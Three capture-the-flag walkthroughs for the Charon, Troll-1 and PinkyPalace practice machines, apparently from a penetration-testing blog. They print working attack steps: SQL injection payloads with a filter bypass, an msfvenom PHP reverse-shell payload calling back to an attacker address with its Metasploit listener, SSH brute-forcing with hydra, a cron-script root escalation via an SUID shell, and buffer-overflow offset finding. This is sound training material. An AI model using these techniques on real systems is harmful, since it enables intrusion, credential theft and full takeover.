Hack the Box Challenge: Charon Walkthrough

Hello friends!! Today we are going to solve another CTF challenge “Charon” which is available online for those who want to increase their skill in penetration testing and black box testing. Charon is retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to Expert level.

Level: Expert

Task: find user.txt and root.txt file on victim’s machine.

Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.31 so let’s begin with nmap port enumeration.

nmap -sV 10.10.10.31

From given below image, you can observe we found port 22 and 80 are open on target system.

As port 80 is running http server we open the target machine’s ip address in our browser.

We run dirbuster on port 80, which reveals a directory entitled “cmsdata/”.

We open the link, and are presented with a login page.

We don’t find anything on the login page, so we go to forgot password link.

We capture the request of the page using burpsuite, and send it to repeater.

After sending the request to repeater, we try to enumerate if the site is vulnerable to SQL-injection. As soon as we add a quote at the end of our email id we get a database error.

Now to confirm that the site is vulnerable to SQL-injection we use “-- - “to comment the query and remove the error.

Now as we know the site is vulnerable to SQL injection, we try to exploit it. First we find the number of columns, to check the number of columns we use “ORDER BY” command to find the number of columns in the table. After find the number of columns we use “UNION SELECT” command to give the output column names with the respective numbers. As UNION and union is blacklisted, we use UNion for SQL-injection.

‘UNion SELECT 1,2,3,4 -- -

We couldn’t run any commands in columns, but when we pass a string in column 4, we successfully ran our query.

Now we know how bypass the security using string, we first find the name of the database

‘ UNion select 1,2,3,concat(database(), “@who.ami”) -- -

After finding the name of the database we find the table name in the database.

‘ UNion select 1,2,3,concat(table_name, “@who.ami”) FROM information_schema.tables where table_schema=”supercms” limit 1,1 -- -

Enumerating the tables in the database; we find two tables, one called license and another one called operators.

‘ UNion select 1,2,3,concat(table_name, “@who.ami”) FROM information_schema.tables where table_schema=”supercms” limit 2,1 -- -

After getting the names of the tables, we enumerate the columns. The license table doesn’t have any interesting columns but in the “operators” table we find a column called “__username_”.

‘ UNion select 1,2,3,concat(column_name, “@who.ami”) FROM information_schema.columns where table_name=”operators” limit 1,1 -- -

After getting the “__username_” column we enumerate further and get a column called “__password_”.

‘ UNion select 1,2,3,concat(column_name, “@who.ami”) FROM information_schema.columns where table_name=”operators” limit 2,1 -- -

Now we dump the column name “__username_”.

‘ UNion select 1,2,3,concat(__username_, “@who.ami”) FROM operators limit 1,1 -- -

Now we dump the column name “__password_” for the username = “super_cms_adm”.

‘ UNion select 1,2,3,concat(__username_, “@who.ami”) FROM operators limit 1,1 -- -

When we dump the “__password_” column we get a hash. We use hashkiller.co.uk to crack the password.

Now we got the credentials for the supercms login page, supercms:tamarro.

Now login using the above credentials, we were able to get a page where there is an option for uploading image.

Now we open the link and find an upload page.

We take a look at the source page and find a base64 encoded string.

When we decode it we find a string called “testfile1”. It is possible that there is hidden field with this name.

Now we create a php payload using msfvenom, so that we can upload our php shell.

msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.7 lport=4444 -f raw

We capture the upload request and create a new field and add “file.php”.

Now we get the link the location of the file we just uploaded in /images/.

Before running our shell, we setup our listener using metasploit.

msf > use exploit/multi/handler

msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp

msf exploit(multi/handler) > set lhost 10.10.14.7

msf exploit(multi/handler) > set lport 4444

msf exploit(multi/handler) > run

As soon as we open the link to our shell, we get our reverse shell.

meterpreter > sysinfo

Now enumerating through the system we find an encrytpted file and a public key inside /home/decoder directory.

We download both the files into our system.

meterpreter > download decoder.pub /root/Desktop

meterpreter > download pass.crypt /root/Desktop

Now we decode the encrypted file using public key with the RsaCtfTool.

./RsaCtfTool.py --publickey /root/Desktop/decoder.pub –uncipherfile /root/Desktop/pass.crypt

We use ssh to login using the credentials, decoder:nevermindthebollocks.

ssh decoder@10.10.10.31

After logging in we find a file called user.txt, we open the file and find our first flag.

Now we find the files with SUID bit set and find a file called supershell in /usr/local/bin/ directory.

find / -perm -4000 2>/dev/null

When we run the binary we find that we can run any shell command using this binary. We use this to open root.txt inside /root/ directory. When we open root.txt we find our final flag.

supershell “/bin/ls$

> cat /root/root.txt”

Hack the Troll-1 VM (Boot to Root)

Hello friends today we are going to solve another CTF challenge “Troll 1” of the vulnhub labs. The level of this challenge is not so tough and its difficulty level is described as beginner/intermediate. You can download it from here https://www.vulnhub.com/entry/tr0ll-1,100/

Penetrating Methodology

§  Network Scanning (Nmap, netdiscover)

§  Anonymous FTP login

§  Abusing web browser

§  Brute-force attack (hydra)

§  SSH login

§  Privilege Escalation

§  Get root access

§  Capture the flag

Let’s Begin!!

Start with netdiscover command to identify target IP in the local network, in my network 192.168.1.102 is my target IP, you will get yours.

Further let’s enumerate open and protocols information in the target’s network with help of nmap following command:

nmap –A 192.168.1.102

From its result we found port 21 for FTP, 22 for SSH and 80 for HTTP are open. Moreover FTP anonymous login is allowed.

So we explore target IP in the web browser and welcomed by following image………………

Since FTP anonymous login was allowed so we logged in as anonymous: anonymous and download a lol.pcap file

ftp 192.168.1.102

ls –al

get lol.pcap

When we opened lol.pcap file it was a wireshark TCP packet and when we have opened 1^st TCP stream it put up following image as shown.

While looking in TCP stream 2, I notice something suspicious “sup3rs3cr3tdirlol” it could any possible web directory. So let’s step up for further approach and figure out what this sup3rs3cr3tdirlol indicates.

So when I explore http://192.168.1.102/sup3rs3cr3tdirlol in the web browser, it put up following web page where we found a file roflmao and decide to download it.  

Then with help of “string” a tool in kali Linux we explored the file roflmao and got a message ‘Find the address 0x0856BF to proceed’

Then again I explored /0x0856BF in the web browser considering a possible web directory and indeed it gives two sub-directories as shown in the below image.

I opened both sub-directories and /good-luck looks interesting to me as it called a lol.txt file which contains a wordlist and might be this could be useful in conducting the brute force attack against ssh login. Also the folder /this_folder_contains_the_password gave hint “Pass.txt” could be possible password.

Then we copied lol.txt wordlist into a text file and saved as dict.txt for username (remove 5^th line while pasting the content of lol.txt into dict.txt). Since we have username dictionary file and also well aware from password let’s lunch brute-force attack for ssh login and for this you can use following command.

hydra -L /root/Desktop/dict.txt -p Pass.txt 192.168.1.102 ssh

OOOooooh Great!! Hhere is our possible ssh login credential overflow:Pass.txt

With help of above extracted credential we have made successful SSH login and spawned tty shell victim’s machine. Now let’s finished task quickly and for that we need to escalated root privileges……………. 

ssh overflow@192.168.1.102

find / -writable 2

Then we have enumerated all writeable file with help of above command.

We found a python file cleaner.py inside /lib/log and it is a small program. So here the following script was added by admin to cleanup all junk file from inside /tmp and these type of files depends upon specific time interval for executions.

There so many methods to gain root access as in this method we copied /bin/sh inside /tmp and enabled SUID for /tmp/sh. It is quite simple, first, open the file through some editor for example nano sanitizer.py and replace“rm -r /tmp/*” from the following line as given below:

os.system('cp /bin/sh /tmp/sh')

os.system('chmod u+s /tmp/sh')

After some time it will create an sh file inside /tmp directory having SUID permission and when you will run it you will give root access.

cd /tmp

ls

./sh

cd /root

ls

cat proof.txt

HURRAYYYYYYY!!! We hit the Goal……………………………….

Hack the Box Challenge: PinkyPalace Walkthrough

Hello friends! Today we are going to take another boot2root challenge known as PinkyPalace. The credit for making this vm machine goes to “Pink_panther” and it is another boot to root challenge in which our goal is to gain root access to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let’s do an nmap scan for port enumeration.

nmap -sV -p- 192.168.1.137

Nmap scan shows us the following ports are open and the corresponding services are running:

 nginx web server on port 8080 
 a squid proxy on port 31337 
 a ssh daemon  on port 64666 

As port 8080 is running nginx, we try to enumerate the webserver but it returns a 403 forbidden code.

Now we know that the target machine is running squid server so we try to parse any request that go through it. We use foxyproxy addon to setup a proxy connection in our browser.

After setting up our proxy we try to open the webserver, we find that the server is probably configured to allow access from localhost. As when we try to access it via server’s IP address we still get a forbidden response.

We enumerate the directories by pivoting our connection through the squid proxy and find a directory called littlesecretes-main/.

dirb http://127.0.0.1:8080 /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -p 192.168.1.137:31337

We open the link that was discovered by the dirb scan, it opens up a page that asks for username and password. We tried to check for sql injection using sqlmap and find that the page is vulnerable to sql injection.

Now we enumerate the users and password using sqlmap and find 2 users and the hashes of there password.

sqlmap --proxy=http://192.168.1.137:31337 –data=”user=hacking&pass=articles&submit=Login” -u http://127.0.0.1:8080/littlesecrets-main/login.php --level=5 --risk=3 --dump users

We use the site https://hashkiller.co.uk/md5-decrypter.aspx to decrypt the hash we found in the sqlmap dump. The password for the user pinkymage was decrypted.

We were unable to login through the web server using these credentials. So we used them to login through ssh.

ssh pinkymanage@192.168.1.137 -p64666

While enumerating the target machine we find a file called “note.txt” in /var/www/html/littlesecrets-main/ultrasecretadminf1l35/, we open the open and find a hint to search for RSA key. We tried to search for hidden files in the directory and find a hidden file called “.ultrasecret”.

When we take a look at the content of the hidden file; we find a base64 encoded string and when we decrypted it we find that it was a RSA Key.

We tried to decrypt and save the file in the current directory but we don’t have write permissions for the directory. So we decrypt the hidden file and save it in our home directory of user pinkymanage as id_rsa.

Now we move to the home directory for the user pinkymanage and give the RSA key its appropriate permissions. Then we login as user pinky through ssh.

chmod 600 id_rsa

ssh -i id_rsa pinky@localhost -p64666

After logging in as pinky we find two files one executable with suid bit set called “adminhelper” and another text file called “note.txt”. We open the note.txt and find

Now we download the file to our system using base64 to convert the hex strings in the file into base64 encrypted strings

Now we decrypt the file into our system as save it as file admin.

We open the file in our sytem and find a strcpy function in line main+42; as strcpy is vulnerable to buffer overflow. We will try to exploit this vulnerability.

To exploit buffer overflow, first we need to overwrite the adjacent memory locations and find the EIP offset. We use pattern_create.rb script to generate a 78 bytes long string.

./pattern_create.rb -l 78

Now we run the file with the string we generated as our argument and find that we were able to overwrite the EIP.

To find the EIP offset we used the pattern_offset command, and find the EIP offset to be 72.

./pattern_offset.rb -q 356341346341 -l 78

There are no binary defences like NX or ASLR but there is PIE. So we can’t use the ROP tricks, but we can use Shellcode Injection. We overwrite the EIP with the address of our shellcode which was stored in the kernel environment. This spawns a tty shell as root user.

Now we move to root directory and find a file called “root.txt” inside it. We take a look at the content of the file and find the congratulatory flag.